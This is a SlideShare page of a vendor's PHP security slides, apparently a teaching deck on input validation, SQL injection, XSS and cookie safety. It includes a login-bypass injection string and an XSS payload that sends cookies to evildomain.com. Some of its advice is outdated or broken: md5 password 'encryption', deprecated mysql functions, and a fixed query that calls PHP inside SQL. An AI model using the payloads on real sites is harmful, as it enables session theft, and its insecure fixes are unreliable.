SlideShare ist ein Scribd-Unternehmen logo

PHP Security

Als PPT, PDF herunterladen
Mindfire Solutions
Mindfire Solutions

PHP Security

Technologie
1 von 22
PHP SECURITY
What Is Security? Security is a measurement, not a characteristic. ,[object Object],[object Object],[object Object],www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Consequently PHP applications often end up working with sensitive data a. Unauthorized access to this data is unacceptable. b. To prevent problems a secure design is needed . www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Basic Steps 1.Input fields must be sanitized before being used One of the key concepts you must accept is that user input is unreliable and not to be trusted. Partially lost in transmission between server & client. Corrupted by some in-between process. Modified by the malicoius user in an unexpected manner. Intentional attempt to gain unauthorized access or to crash the application. There are are many ways to sanitize data. One can use php inbuild function for the santization pupose or can use custom defined functions. Eg: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous. if (!empty($_GET['id'])) { $id = (int) $_GET['id']; } else{ $id = 0; } As well as PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
if (!ctype_alnum($_GET['login'])) { echo "Only A-Za-z0-9 are allowed."; } if (!ctype_alpha($_GET['captcha'])) { echo "Only A-Za-z are allowed."; } You can use also your own customized validation.Like function validateEmail($email){ if($email == ""){ return false; } else{ if(!preg_match("(^[-]+@([-a-z0-9]+)+[a-z]{2,4}$)i", $email)){ return false; } else{ return true; } } } www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
2.Data Validations As we all know there are 2 types of validation for a web application. As follows: a. Client side validation b. Server side validation Client side validation is not reliable as an attacker can always bypass the client side validations or can shuts off the client-side script routines, for example, by disabling JavaScript. Hence Server side validation is a must for the security point of view, even if the client-side validation do exists. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
3. Accessing Input Data: There are a series of super-globals which offer very simple access to the input data. $_GET , $_POST, $_SERVER, $_REQUEST Using GET to send sensitive data causes security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string like in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because, the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later. The POST method uses the HTTP body to pass information and this is good in this case because the HTTP body is not logged. Using POST doesn’t offer enough protection. The data’s confidentiality and integrity are still at risk because the information is still sent in clear text. So the use of encryption technique is required, using SSL. Ddata is stored and accessed securely. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
4.Escaping Output Output is anything that leaves your application, bound for a client. The client, in this case, is anything from aWeb browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands. To escape output intended for a Web browser, PHP provides htmlspecialchars()‏ and htmlentities(), EG: $_POST['data'] = “<script>alert('Security issues');</script>”; if (get_magic_quotes_gpc()) { $var = stripslashes($_POST['data']); } echo htmlentities($var ); www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
5.Register Globals The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Making register global on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled. Why it is a security risk? Let us consider the following block of codes <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?> www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Since $authorized is left un-initialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET. http://example.com/script.php?authorized=1 Solutions: Disable register_globals in PHP.ini. Already done by default as of PHP 4.2.0 . Code with error_reporting set to E_ALL. Allows you to see warnings about the use of un-initialized variables. Type sensitive validation conditions. Because input is always a string, type sensitive compare to a Boolean or an integer will always fail. A best practice is to initialize all variables. Error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
6.Error Reporting: During development, making error reporting turned on is good practise. ini_set('error_reporting',E_ALL); However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development ,your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong. error_reporting(E_ALL^E_NOTICE); // This is a 'sensible' reporting level ini_set('display_errors', 0); // Hide all error messages from the public ini_set('log_errors', 1); ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
7.SQL Injection SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. One of the most common vulnerabilities is when logging in to a site. Take this example: $username = $_POST['username']; $password = $_POST['password']; $result = mysql_query(&quot; SELECT * FROM site_users WHERE username = '$username' AND password = '$password' &quot;); if ( mysql_num_rows($result) > 0 )‏ // logged in www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
If the attacker enters a valid username in the username field &quot;rob&quot; and the following in the password field ' OR 1=1 ' The resulting query will look like this: SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1 Since the last crieteria will always be true.The user will be able to log in as rob without knowing rob's password. Prevnting Sql injection: The best way of cleaning input is using PHP's built in mysql_real_escape_string() function, this will escape characters such as ',&quot;&quot; and others. checking the magic quotes is on or off to avoid double escaping. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Function check_sql_injection($var){ if(get_magic_quotes_gpc()) { $var = stripslashes($var); } $var = mysql_real_escape_string($var); return $var; } Now this customized function can be used in sql query to prevent sql injection.. SELECT * FROM site_users WHERE username =check_sql_injection( '$username')‏ AND password = check_sql_injection( '$password)‏ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
8.XSS XSS stands for &quot;Cross Site Scripting&quot;, and refers to the act of inserting content, such as Javascript, into a page. Usually these attacks are used to steal cookies which often contain sensitive data such as login information. EG: $id = $_GET['id']; echo 'Displaying news item number '.$id; An attacker could pass string like this <script>window.location.href = &quot;http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script> If a user passed this simple Javascript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Prevent XSS attacks? This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built in strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to &lt; and &gt; respectively. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
9. Passwords need to be stored securely. Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achivied using md5 command or any stronger method of algorithm. By using this, the attacker wont able access the password of a user. 10. Lock out functionality must be there for the login functionality. An attacker may continue to brute force the login functions until successful. So to prevent the same after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for another a given period of time. For example 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
11.The email forms are vulnerable to email header injection Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed and using captcha during mail form submission. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
12. Using Cookies Securely Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines: Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie. Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible. Consider encrypting information in cookies. Consider setting the Secure and HttpOnly properties on your cookies to true. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
Mindfire Solutions Expertise in PHP ,[object Object],[object Object],[object Object],www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
For further queries contact us or call 1-248-686-1424 www.mindfiresolutions.com www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions

Empfohlen

Php
PhpPhp
PhpShyam Khant
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionsLena Petsenchuk
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hackingleminhvuong
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
Oops in PHP
Oops in PHPOops in PHP
Oops in PHPMindfire Solutions
 
Php.ppt
Php.pptPhp.ppt
Php.pptNidhi mishra
 
Uploading a file with php
Uploading a file with phpUploading a file with php
Uploading a file with phpMuhamad Al Imran
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 

Empfohlen

Php
PhpPhp
PhpShyam Khant
 
Cookies and sessions
Cookies and sessionsCookies and sessions
Cookies and sessionsLena Petsenchuk
 
Module 8 System Hacking
Module 8 System HackingModule 8 System Hacking
Module 8 System Hackingleminhvuong
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
Oops in PHP
Oops in PHPOops in PHP
Oops in PHPMindfire Solutions
 
Php.ppt
Php.pptPhp.ppt
Php.pptNidhi mishra
 
Uploading a file with php
Uploading a file with phpUploading a file with php
Uploading a file with phpMuhamad Al Imran
 
Android Security & Penetration Testing
Android Security & Penetration TestingAndroid Security & Penetration Testing
Android Security & Penetration TestingSubho Halder
 
Php Using Arrays
Php Using ArraysPhp Using Arrays
Php Using Arraysmussawir20
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response StructureBhagyashreeGajera1
 
Password cracking and brute force tools
Password cracking and brute force toolsPassword cracking and brute force tools
Password cracking and brute force toolszeus7856
 
Php with MYSQL Database
Php with MYSQL DatabasePhp with MYSQL Database
Php with MYSQL DatabaseComputer Hardware & Trouble shooting
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentationMahmoud Ibra
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Network programming in java - PPT
Network programming in java - PPTNetwork programming in java - PPT
Network programming in java - PPTkamal kotecha
 
Event handling
Event handlingEvent handling
Event handlingAnand Grewal
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Form Processing In Php
Form Processing In PhpForm Processing In Php
Form Processing In PhpHarit Kothari
 
Lesson 2 php data types
Lesson 2 php data typesLesson 2 php data types
Lesson 2 php data typesMLG College of Learning, Inc
 
Flask – Python
Flask – PythonFlask – Python
Flask – PythonMax Claus Nunes
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
jstl ( jsp standard tag library )
jstl ( jsp standard tag library )jstl ( jsp standard tag library )
jstl ( jsp standard tag library )Adarsh Patel
 
Java rmi example program with code
Java rmi example program with codeJava rmi example program with code
Java rmi example program with codekamal kotecha
 
Sessions and cookies in php
Sessions and cookies in phpSessions and cookies in php
Sessions and cookies in phpPavan b
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsVibrant Technologies & Computers
 
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?ITpreneurs
 
Servlets
ServletsServlets
ServletsGeethu Mohan
 
Flask Introduction - Python Meetup
Flask Introduction - Python MeetupFlask Introduction - Python Meetup
Flask Introduction - Python MeetupAreski Belaid
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 

Weitere ähnliche Inhalte

Was ist angesagt?

Php Using Arrays
Php Using ArraysPhp Using Arrays
Php Using Arraysmussawir20
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response StructureBhagyashreeGajera1
 
Password cracking and brute force tools
Password cracking and brute force toolsPassword cracking and brute force tools
Password cracking and brute force toolszeus7856
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentationMahmoud Ibra
 
Network programming in java - PPT
Network programming in java - PPTNetwork programming in java - PPT
Network programming in java - PPTkamal kotecha
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Form Processing In Php
Form Processing In PhpForm Processing In Php
Form Processing In PhpHarit Kothari
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
jstl ( jsp standard tag library )
jstl ( jsp standard tag library )jstl ( jsp standard tag library )
jstl ( jsp standard tag library )Adarsh Patel
 
Java rmi example program with code
Java rmi example program with codeJava rmi example program with code
Java rmi example program with codekamal kotecha
 
Sessions and cookies in php
Sessions and cookies in phpSessions and cookies in php
Sessions and cookies in phpPavan b
 
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?ITpreneurs
 
Flask Introduction - Python Meetup
Flask Introduction - Python MeetupFlask Introduction - Python Meetup
Flask Introduction - Python MeetupAreski Belaid
 

Was ist angesagt? (20)

Php Using Arrays
Php Using ArraysPhp Using Arrays
Php Using Arrays
 
HTTP Request and Response Structure
HTTP Request and Response StructureHTTP Request and Response Structure
HTTP Request and Response Structure
 
Password cracking and brute force tools
Password cracking and brute force toolsPassword cracking and brute force tools
Password cracking and brute force tools
 
Php with MYSQL Database
Php with MYSQL DatabasePhp with MYSQL Database
Php with MYSQL Database
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentation
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Network programming in java - PPT
Network programming in java - PPTNetwork programming in java - PPT
Network programming in java - PPT
 
Event handling
Event handlingEvent handling
Event handling
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Form Processing In Php
Form Processing In PhpForm Processing In Php
Form Processing In Php
 
Lesson 2 php data types
Lesson 2 php data typesLesson 2 php data types
Lesson 2 php data types
 
Flask – Python
Flask – PythonFlask – Python
Flask – Python
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
jstl ( jsp standard tag library )
jstl ( jsp standard tag library )jstl ( jsp standard tag library )
jstl ( jsp standard tag library )
 
Java rmi example program with code
Java rmi example program with codeJava rmi example program with code
Java rmi example program with code
 
Sessions and cookies in php
Sessions and cookies in phpSessions and cookies in php
Sessions and cookies in php
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP Fundamentals
 
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
EC-Council Certified Ethical Hacker (CEH) v9 - Hackers are here. Where are you?
 
Servlets
ServletsServlets
Servlets
 
Flask Introduction - Python Meetup
Flask Introduction - Python MeetupFlask Introduction - Python Meetup
Flask Introduction - Python Meetup
 

Ähnlich wie PHP Security

Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 
Website Security
Website SecurityWebsite Security
Website SecurityMODxpo
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007Aung Khant
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
Php Security3895
Php Security3895Php Security3895
Php Security3895Aung Khant
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Barry Dorrans
 

Ähnlich wie PHP Security (20)

Web application security
Web application securityWeb application security
Web application security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Website Security
Website SecurityWebsite Security
Website Security
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
Php Security3895
Php Security3895Php Security3895
Php Security3895
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
Php security
Php securityPhp security
Php security
 
Php security3895
Php security3895Php security3895
Php security3895
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
secure php
secure phpsecure php
secure php
 
Download It
Download ItDownload It
Download It
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10Don't get stung - an introduction to the OWASP Top 10
Don't get stung - an introduction to the OWASP Top 10
 
Web Security
Web SecurityWeb Security
Web Security
 
&lt;img src="xss.com">
&lt;img src="xss.com">&lt;img src="xss.com">
&lt;img src="xss.com">
 
Fav
FavFav
Fav
 

Mehr von Mindfire Solutions

High Availability of Azure Applications
High Availability of Azure ApplicationsHigh Availability of Azure Applications
High Availability of Azure ApplicationsMindfire Solutions
 
Oracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedOracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedMindfire Solutions
 
Introduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacIntroduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacMindfire Solutions
 
Get started with watch kit development
Get started with watch kit developmentGet started with watch kit development
Get started with watch kit developmentMindfire Solutions
 

Mehr von Mindfire Solutions (20)

Physician Search and Review
Physician Search and ReviewPhysician Search and Review
Physician Search and Review
 
diet management app
diet management appdiet management app
diet management app
 
Business Technology Solution
Business Technology SolutionBusiness Technology Solution
Business Technology Solution
 
Remote Health Monitoring
Remote Health MonitoringRemote Health Monitoring
Remote Health Monitoring
 
Influencer Marketing Solution
Influencer Marketing SolutionInfluencer Marketing Solution
Influencer Marketing Solution
 
ELMAH
ELMAHELMAH
ELMAH
 
High Availability of Azure Applications
High Availability of Azure ApplicationsHigh Availability of Azure Applications
High Availability of Azure Applications
 
IOT Hands On
IOT Hands OnIOT Hands On
IOT Hands On
 
Glimpse of Loops Vs Set
Glimpse of Loops Vs SetGlimpse of Loops Vs Set
Glimpse of Loops Vs Set
 
Oracle Sql Developer-Getting Started
Oracle Sql Developer-Getting StartedOracle Sql Developer-Getting Started
Oracle Sql Developer-Getting Started
 
Adaptive Layout In iOS 8
Adaptive Layout In iOS 8Adaptive Layout In iOS 8
Adaptive Layout In iOS 8
 
Introduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/MacIntroduction to Auto-layout : iOS/Mac
Introduction to Auto-layout : iOS/Mac
 
LINQPad - utility Tool
LINQPad - utility ToolLINQPad - utility Tool
LINQPad - utility Tool
 
Get started with watch kit development
Get started with watch kit developmentGet started with watch kit development
Get started with watch kit development
 
Swift vs Objective-C
Swift vs Objective-CSwift vs Objective-C
Swift vs Objective-C
 
Material Design in Android
Material Design in AndroidMaterial Design in Android
Material Design in Android
 
Introduction to OData
Introduction to ODataIntroduction to OData
Introduction to OData
 
Ext js Part 2- MVC
Ext js Part 2- MVCExt js Part 2- MVC
Ext js Part 2- MVC
 
ExtJs Basic Part-1
ExtJs Basic Part-1ExtJs Basic Part-1
ExtJs Basic Part-1
 
Spring Security Introduction
Spring Security IntroductionSpring Security Introduction
Spring Security Introduction
 

Kürzlich hochgeladen

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 

Kürzlich hochgeladen (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
